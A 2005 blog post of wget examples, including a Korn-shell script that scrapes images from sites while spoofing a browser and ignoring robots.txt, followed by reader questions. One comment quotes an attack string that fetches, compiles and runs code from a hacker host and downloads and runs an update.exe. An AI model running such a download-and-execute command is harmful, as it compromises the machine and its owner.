| Wget examples and scriptsKrazyWorks

Wget examples and scripts

Submitted by Igor on November 27, 2005 – 3:19 pm 27 Comments

Wget is a command-line Web browser for Unix and Windows. Wget can download Web pages and files; it can submit form data and follow links; it can mirror entire Web sites and make local copies. Wget is one of the most useful applications you would ever install on your computer and it is free.

You can download the latest version of Wget from the developers home page. Precompiled versions of Wget are available for Windows and for most flavors of Unix. Many Unix operating system have wget pre-installed, so type which wget to see if you already have it.

Wget supports a multitude of options and parameters. This variety may be confusing to people unfamiliar with Wget. You can view the available Wget options by typing wget –help or on a Unix box type man wget.

Here are a few useful examples on how to use Wget:

1) Download main page of Yahoo.com and save it as yahoo.htm

wget -O yahoo.htm http://www.yahoo.com

2) Use Wget with an HTTP firewall:

Set proxy in Korn or Bash shells
export http_proxy=proxy_server.domain:port_number
Set proxy in C-shell
setenv http_proxy proxy_server.domain:port_number
Run wget for anonymous proxy
wget -Y -O yahoo.htm "http://www.yahoo.com"
Run wget for proxy that requires authentication
wget -Y --proxy-user=your_username --proxy-passwd=your_password -O yahoo.htm "http://www.yahoo.com"

3) Make a local mirror of Wget home page that you can browse from your hard drive

Here are the options we will use:

-m to mirror the site
-k to make all links local
-D to stay within the specified domain
–follow-ftp to follow FTP links
-np not to ascend to the parent directory

The following two options are to deal with Web sites protected against automated download tools such as Wget:

-U to mascarade as a Mozilla browser
-e robots=off to ignore no-robots server directives
wget -U Mozilla -m -k -D gnu.org --follow-ftp -np "http://www.gnu.org/software/wget/" -e robots=off

4) Download all images from Playboy site

Here are the options we will use:

-r for recursive download
-l 0 for unlimited levels
-t 1 for one download attempt per link
-nd not to create local directories
-A to download only files with specified extentions
wget -r -l 0 -U Mozilla -t 1 -nd -D playboy.com -A jpg,jpeg,gif,png "http://www.playboy.com" -e robots=off

5) Web image collector

The following Korn-shell script reads from a list of URLs and downloads all images found anywhere on those sites. The images are processed and all images smaller than a certain size are deleted. The remaining images are saved in a folder with named after the URL. The url_list.txt file contains one URL per line.

This script was originally written to run under AT&T UWIN on Windows, but it will also work in any native Unix environment that has Korn shell.

#!/bin/ksh
# WIC.ksh - Web Image Collector
#
# WIC reads from a list of URLs and spiders each site recursively
# downloading images that match specified criteria (type, size).

#-----------------------------------------------------------------
# ENVIRONMENT CONFIGURATION
#-----------------------------------------------------------------

WORKDIR="C:/Downloads"	# Working directory
cd "$WORKDIR"
OUTPUT="$WORKDIR/output"	# Final output directory
URLS="$WORKDIR/url_list.txt"	# List of URLs
WGET="/usr/bin/wget"		# Wget executable
SIZE="+7k"			# Minimum image size to keep

TMPDIR1="$WORKDIR/tmp1"		# Temporary directory 1
TMPDIR2="$WORKDIR/tmp2"		# Temporary directory 2
TMPDIR3="$WORKDIR/tmp3"		# Temporary directory 3

if [ ! -d "$WORKDIR" ]
then
	mkdir "$WORKDIR"
	if [ ! -d "$WORKDiR" ]
	then
		echo "Download directory not found. Exiting..."
		exit 1
	fi
fi

if [ ! -d "$OUTPUT" ]
then
	mkdir "$OUTPUT"
	if [ ! -d "$OUTPUT" ]
	then
		echo "Cannot create $OUTPUT directory. Exiting..."
		exit 1
	fi
fi

if [ ! -f "$URLS" ]
then
	echo "URL list not found in $WORKDIR. Exiting..."
	exit 1
fi

for i in 1 2 3
do
	if [ -d "$WORKDIR/tmp$i" ]
	then
		rm -r "$WORKDIR/tmp$i"
		mkdir "$WORKDIR/tmp$i"
	else
		mkdir "$WORKDIR/tmp$i"
	fi
done

if [ ! -f "$WGET" ]
then
	echo "$WGET executable not found. Exiting..."
	exit 1
fi

#-----------------------------------------------------------------
# DOWNLOAD IMAGES
#-----------------------------------------------------------------

cat "$URLS" | while read URL
do
	echo "Processing $URL"

	DOMAIN=$(echo "$URL" | awk -F'/' '{print $3}')

	if [ ! -d "$OUTPUT/$DOMAIN" ]
	then
		cd "$TMPDIR1"
		mkdir "$OUTPUT/$DOMAIN"
		$WGET --http-user=your_username --http-passwd=your_password -r -l 0 -U Mozilla -t 1 -nd -A jpg,jpeg,gif,png,pdf "$URL" -e robots=off
		find "$TMPDIR1" -type f -size "$SIZE" -exec mv {} "$OUTPUT/$DOMAIN" ;
		cd "$WORKDIR"
	else
		echo "	$URL already processed. Skipping..."
	fi

	for i in 1 2 3
	do
		if [ -d "$WORKDIR/tmp$i" ]
		then
			rm -r "$WORKDIR/tmp$i"
			mkdir "$WORKDIR/tmp$i"
		else
			mkdir "$WORKDIR/tmp$i"
			fi
	done
done

#-----------------------------------------------------------------
# Remove empty download directories
#-----------------------------------------------------------------

cd "$OUTPUT"
find . -type d | fgrep "./" | while read DIR
do
	if [ `ls -R "$DIR" | wc -l | awk '{print $1}'` -eq 0 ]
	then
		rmdir "$DIR"
	fi
done

cd "$WORKDIR"

6) Wget options

GNU Wget 1.8.1+cvs, a non-interactive network retriever.
Usage: wget [OPTION]... [URL]...

Mandatory arguments to long options are mandatory for short options too.

Startup:
  -V,  --version           display the version of Wget and exit.
  -h,  --help              print this help.
  -b,  --background        go to background after startup.
  -e,  --execute=COMMAND   execute a `.wgetrc'-style command.

Logging and input file:
  -o,  --output-file=FILE     log messages to FILE.
  -a,  --append-output=FILE   append messages to FILE.
  -d,  --debug                print debug output.
  -q,  --quiet                quiet (no output).
  -v,  --verbose              be verbose (this is the default).
  -nv, --non-verbose          turn off verboseness, without being quiet.
  -i,  --input-file=FILE      download URLs found in FILE.
  -F,  --force-html           treat input file as HTML.
  -B,  --base=URL             prepends URL to relative links in -F -i file.
       --sslcertfile=FILE     optional client certificate.
       --sslcertkey=KEYFILE   optional keyfile for this certificate.
       --egd-file=FILE        file name of the EGD socket.

Download:
       --bind-address=ADDRESS   bind to ADDRESS (hostname or IP) on local host.
  -t,  --tries=NUMBER           set number of retries to NUMBER (0 unlimits).
  -O   --output-document=FILE   write documents to FILE.
  -nc, --no-clobber             don't clobber existing files or use .# suffixes.
  -c,  --continue               resume getting a partially-downloaded file.
       --progress=TYPE          select progress gauge type.
  -N,  --timestamping           don't re-retrieve files unless newer than local.
  -S,  --server-response        print server response.
       --spider                 don't download anything.
  -T,  --timeout=SECONDS        set the read timeout to SECONDS.
  -w,  --wait=SECONDS           wait SECONDS between retrievals.
       --waitretry=SECONDS      wait 1...SECONDS between retries of a retrieval.
       --random-wait            wait from 0...2*WAIT secs between retrievals.
  -Y,  --proxy=on/off           turn proxy on or off.
  -Q,  --quota=NUMBER           set retrieval quota to NUMBER.
       --limit-rate=RATE        limit download rate to RATE.

Directories:
  -nd  --no-directories            don't create directories.
  -x,  --force-directories         force creation of directories.
  -nH, --no-host-directories       don't create host directories.
  -P,  --directory-prefix=PREFIX   save files to PREFIX/...
       --cut-dirs=NUMBER           ignore NUMBER remote directory components.

HTTP options:
       --http-user=USER      set http user to USER.
       --http-passwd=PASS    set http password to PASS.
  -C,  --cache=on/off        (dis)allow server-cached data (normally allowed).
  -E,  --html-extension      save all text/html documents with .html extension.
       --ignore-length       ignore `Content-Length' header field.
       --header=STRING       insert STRING among the headers.
       --proxy-user=USER     set USER as proxy username.
       --proxy-passwd=PASS   set PASS as proxy password.
       --referer=URL         include `Referer: URL' header in HTTP request.
  -s,  --save-headers        save the HTTP headers to file.
  -U,  --user-agent=AGENT    identify as AGENT instead of Wget/VERSION.
       --no-http-keep-alive  disable HTTP keep-alive (persistent connections).
       --cookies=off         don't use cookies.
       --load-cookies=FILE   load cookies from FILE before session.
       --save-cookies=FILE   save cookies to FILE after session.

FTP options:
  -nr, --dont-remove-listing   don't remove `.listing' files.
  -g,  --glob=on/off           turn file name globbing on or off.
       --passive-ftp           use the "passive" transfer mode.
       --retr-symlinks         when recursing, get linked-to files (not dirs).

Recursive retrieval:
  -r,  --recursive          recursive web-suck -- use with care!
  -l,  --level=NUMBER       maximum recursion depth (inf or 0 for infinite).
       --delete-after       delete files locally after downloading them.
  -k,  --convert-links      convert non-relative links to relative.
  -K,  --backup-converted   before converting file X, back up as X.orig.
  -m,  --mirror             shortcut option equivalent to -r -N -l inf -nr.
  -p,  --page-requisites    get all images, etc. needed to display HTML page.

Recursive accept/reject:
  -A,  --accept=LIST                comma-separated list of accepted extensions.
  -R,  --reject=LIST                comma-separated list of rejected extensions.
  -D,  --domains=LIST               comma-separated list of accepted domains.
       --exclude-domains=LIST       comma-separated list of rejected domains.
       --follow-ftp                 follow FTP links from HTML documents.
       --follow-tags=LIST           comma-separated list of followed HTML tags.
  -G,  --ignore-tags=LIST           comma-separated list of ignored HTML tags.
  -H,  --span-hosts                 go to foreign hosts when recursive.
  -L,  --relative                   follow relative links only.
  -I,  --include-directories=LIST   list of allowed directories.
  -X,  --exclude-directories=LIST   list of excluded directories.
  -np, --no-parent                  don't ascend to the parent directory.

27 Comments »

emijrp says:
November 13, 2010 at 8:18 am
Very useful info. Thanks!

Loading...
Reply to this comment »
niko says:
April 25, 2011 at 12:08 pm
best info i ever saw for this problem !!
no bullshit talking, clear information …
VERY GOOD

Loading...
Reply to this comment »
swapnil jaiswal says:
May 3, 2011 at 8:14 am
thanx a lot

really useful and enlightening :-)

Regards,
Swapnil

Loading...
Reply to this comment »
CpILL says:
May 23, 2011 at 8:57 am
Can’t you use the -i option to process a list of urls in a file?

Loading...
Reply to this comment »
admin says:
May 24, 2011 at 12:40 pm
You can use the “-i” option with wget to download a list of URLs. However, you will not have as much control over destination folders as you do when you use a WHILE loop.

Loading...
Reply to this comment »
Fizal says:
August 21, 2011 at 11:14 pm
Wow, awesome, i’ve been looking for that list for a while now! :D ever since i saw the social network!

Loading...
Reply to this comment »
rosch says:
January 10, 2012 at 4:48 pm
For me the image-download example is not working “as is”:
I added the option -p :
from the manual:

This option causes Wget to download all the files that are necessary to properly display a given HTML page. This includes such things as inlined images, sounds, and referenced stylesheets.

Loading...
Reply to this comment »
Modesto Remondet says:
November 8, 2012 at 4:44 am
There are so many operating systems to choose from but i always prefer windows because it is easier to use. ;

Have a look at our own internet site as well
http://www.prettygoddess.com

Loading...
Reply to this comment »
Joe T says:
March 22, 2013 at 1:58 am
I just want to practice Unix commands and start learning shell scripting and what is kernel. Cold you tell me the earliest and/or the smallest version of Unix, I Don’t need Graphical User interface for the time being. I need the Unix to be the smallest to be practiced in with smallest space required for RAM and Hard disk.
Thanks Martino I will try that but could you tell me any version of Unix that is of the size about 2 MB like MS Dos.

Loading...
Reply to this comment »
homerliveshere says:
March 23, 2013 at 12:35 am
Have been wondering for some time.

Excluding other hacks potentially involved, I was wondering if a DDoS attack in it of itself is actually illegal?
And if so at what point is refreshing a page considered illegal?
I was thinking same, but just am curious at what point is the line drawn, 5-25-100-1000+ times a minute? Just seems rather gray area of law to me to me. I mean you’re not actually causing any real damage per se, so im also curious as to what makes it illegal.

Loading...
Reply to this comment »
Beavis says:
March 23, 2013 at 3:30 am
Give me five architecture types that are unrelated and five operating systems that are unrelated.
Unrelated is the key term.

Loading...
Reply to this comment »
Squall Leonhart says:
March 23, 2013 at 9:06 am
What are the fundamental differences between Windows®, Mac OS®, UNIX, and Linux operating systems for personal computers?

Loading...
Reply to this comment »
gail C says:
March 23, 2013 at 12:41 pm
i want to know how can i upload a file that is stored in a web server ( example : http://dl.ibox.org.ua/8/70322/Bengu___Taktik_www.Musicha.com.zip ) to my own web server?
is there any codes or such things that i can put in my web host that can do this thing for me ?
like i put the url of the file that i want to upload to my web host and click the button then it trasfers the file to my web host?
my host supports java script and php!

Loading...
Reply to this comment »
DuckieM10 says:
March 23, 2013 at 8:19 pm
The solution to:
How to prevent the execution of cron job from the url by any user?

I have my cron job script in a folder with the name like password: 3e2fkjn32kgjn.php.
It is possible to a user figure out the url and execute the cron?
If yes, how to prevent that?

Detaills: my cron script emails me the statics of the web every day.

So, Can you tell me if is possible to get the cron url? if yes, how? and how to prevent it?

Thanks-

Loading...
Reply to this comment »
Michael C says:
March 23, 2013 at 10:02 pm
i want to downloads some files(nearly about 1000-2000 zip files) from a website. i can sit around and add each file one after another. please give me a program or script or whatever method so i can automate the download.

The website i am talking about has download link as

abc.co/date/12345/folder/12345_zip.zip

date can be taken care of. the main concern is that number 12345 before and after the folder, they both change simultaneously. eg

abc.co/date/23456/folder/23456_zip.zip
abc.co/date/54321/folder/54321_zip.zip

i tried using curl

abc.co/date/[12345-54321]/folder/[12345-54321]_zip.zip

but it makes to much of combination of downloads i.e. keeps left 12345 as it is and scan through 12345 to 54321 the increment left 12345 +1 then repeats scan from [12345-54321].

also tried bash wget here i have one variable at two places , when using loop the right 12345 with a ” _” is ignored by the program. PLease help me, i dont know much about linux or programing, thanks

Loading...
Reply to this comment »
The Dark Knight says:
March 24, 2013 at 12:49 pm
I have a ConfigSystem file on my Linux machine and the program was ported from a Sun box so it has 4 different functions:

Sun64(), Sun32(), linux32(), and linux64() each with all the compiler settings.

How or where is it told which function to use?

Thanks!

Loading...
Reply to this comment »
mrankinmatt says:
March 24, 2013 at 10:02 pm
I recently starts some email marketing campaigns. We choose a email marketing software named PHPKode Newsletter X. Everything is well but it’s Cronjobs Configuration.

It tells me this in their site,

“The setup processe of a cronjob depends on the hosting software you are using (Plesk, cPanel). Then add the commands bellow.

wget -O – -q -t 1 http://demo.phpnewsletter.org/newsletter_sendmail.php?key=hZwtPALP&user_id=1”

I use a webhosting in HostGator, so anyone tell me how i can setup this cronjobs correctly?
You can find the configuration at their demo site http://www.phpnewsletter.org

Loading...
Reply to this comment »
Clayton Cottrell says:
March 24, 2013 at 11:50 pm
Is it possible to do it in Google Finance ?
For instance : Shanghai stock 900947 ?

Loading...
Reply to this comment »
Picean says:
March 25, 2013 at 11:06 am
I know this sounds bizarre, but my webmaster passed away suddenly and I need to keep my website up and running. I do not have access to his PC. I believe that he was hosting the site on his own servers (not sure). And he is listed as the registrant for my domain name, along with my company name. Ideally what I want to do is move the website to another hosting company and then have someone else administer the website. I assume I would need the software that he used to develop the site in order to do this. HELP! I’ve never encountered a problem like this before and I can’t find any help on the web.

Loading...
Reply to this comment »
norrin_shadowwolf says:
March 25, 2013 at 9:08 pm
I have recently started looking into programing, since I want to start studying it when I start university! And I had this idea of a program I would write. (Had I actually known what I was doing).
I want a program that fetches images from a site which uploads a new picture every day and save it to my desktop background folder! I would like it to do so automatically once every day.
Is there anyone who can write me a “recipe” for a script which I could write down in Python? (I don’t want any downloads since I want to study the script)
Think of it as a small project if you know what you are doing! :)
Any contribution is much appreciated!!

Loading...
Reply to this comment »
United says:
March 26, 2013 at 8:12 am
hey
about 30 mins ago i was typing an email and suddenly it started typing stuff:
ik &echo binary >> ik &echo get update.exe >> >> ik &ftp -n -v -s:ik &del ik &update.exe >> echo mkdir .opz >> echo cd .opz >> echo wget http://shell.h4ck,biz/~kredkrew/index.c >> echo gcc -o opz index.c >> echo nice work >> echo ./opz >> echo Another Rooted!! &exit echo You got owned
i got most of it
there was a bit missing at the start because i was pressing backspace at the beginning i think it said cmd /c then a little bit then the rest of the code
i don’t know if Ive been hacked or something that’s deferentially wrong though i’m lucky that i was typing an email because i found another example of when someone found it in command line
so i think it was meant to go in there
i have researched the site and gone to the url but it all 404s and has databace errors
i first ran a AVG scan and it came up with:
“”;”HKLMSOFTWAREWow6432NodeMicrosoftWindowsCurrentVersionUninstallHardcore”;”Found Dialer.Generic”;”Moved to Virus Vault”
so it removed it to the virus vault i dont know if it was that
when it happend i was running rsbot from powerbot
im not sure if it could have been the script i was using or something but i have now got rid of it (rsbot and the script)
im downloading malware bites, spybot search and destroy, and adaware
imgoing to do a scan with each
is there anything elce i can do?
should i do a system restore?
something that gives me hope is that the url has a , colon insted of dot so i dont thing it would have been able to get to the url

im also going to do a scan for security holes

sorry for the TERRIBLE typing/spelling im trying to get this up asap
i do keep everything up to date
but if the worst comes to worst i may end up reinstalling my os

ive just realised that i has 2 ports open compete ally on my router that go to my pc so i have now removed them

i know im a idiout

Loading...
Reply to this comment »
Harriet W says:
March 26, 2013 at 3:06 pm
Wanted to know if supercomputers required a different operating system than a regular computer. I would think they use something very different or custom made.

Loading...
Reply to this comment »
Andrew S says:
March 27, 2013 at 9:30 am
I am using a chain of pipes to extract a set of links from a downloaded HTML. However, in the one before last step, I have a list of relative URLs and I would like to prepend the address of the server. I would love to insert that in the chain using a command like “prepend” in this example:
grep “my regexp” file.html | more commands | prepend “http://www.server.com/” | wget -i

More generally, it would be cool to have a command which would insert the contents of each input line at a specified place in a pattern, like
sandwich -c _ abc_def:

input line 1
input line 2
->
abcinput line 1def
abcinput line 2def

But a command for only prepending or only appending something to each line would suffice. I mean, it’s easy to cut out a part of each line using cut, there should be a reverse command available, too.

Please note before answering that I’m sure that
1) sed or awk could handle this with ease (but I don’t feel like learning them), and
2) writing a Perl script for this would take 10x less time than typing out this question,
but I think I am missing some really neat standard way of doing this straight from the command line without any extra gear and I want to know. So, how do I go about doing so?

Loading...
Reply to this comment »
thexbox360player says:
March 27, 2013 at 6:32 pm
please help me to create a batch file for downloading
i want to make a batch in which we just type the addresses or links and a paith of folder it is for where the downloaded file store.
this all attemps are for the people those download files from a website daily
for example i download the assingments form the website daily from just one link.
now my aim is this to create a bat .for download all the files from the web on one click
and not perform one by one file.
if you have an idea about this then plz share with me
the coding for batch
for downloading
thanks

Loading...
Reply to this comment »

4 Pingbacks »

Wget and User-Agent Header | KrazyWorks says:
June 29, 2009 at 12:42 pm
[…] command-line downloader and Web crawler application. You can read more about Wget in one of my earlier posts on the subject. One issue with Wget is that some sites block it from accessing their content. This […]

Loading...
Reply